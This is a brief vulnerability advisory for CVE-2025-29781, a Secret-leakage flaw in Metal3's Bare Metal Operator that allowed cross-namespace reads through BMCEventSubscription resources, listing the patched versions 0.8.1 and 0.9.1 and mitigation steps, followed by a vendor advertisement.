CVE-2025-29781

Summary

CVE-2025-29781 affects the Bare Metal Operator (BMO) in Metal3, which allows a malicious Kubernetes account with namespace-level roles to load Secrets from unauthorized namespaces to their authorized namespace through the `BMCEventSubscription` Custom Resource. This vulnerability can result in Secret leakage. Prior to versions 0.8.1 and 0.9.1, BMO did not enforce namespace restrictions, allowing unauthorized access. The patch refuses BMO from reading Secrets from other namespaces than where the corresponding BMH resource exists, preventing Secret leakage. This issue applies to all versions of BMO and is patched in releases 0.9.1 and 0.8.1. To mitigate the risk before upgrading, duplicate and keep existing Secrets in the same namespace as the corresponding BMH. After upgrading, remove the old Secrets. Additionally, BMO RBAC can be configured to be namespace-scoped or use the `WATCH_NAMESPACE` configuration option to limit BMO to a single namespace.

Prevent cyber attacks with Recorded Future by prioritizing and patching critical vulnerabilities being exploited by threat actors targeting your industry. Book your demo to learn more.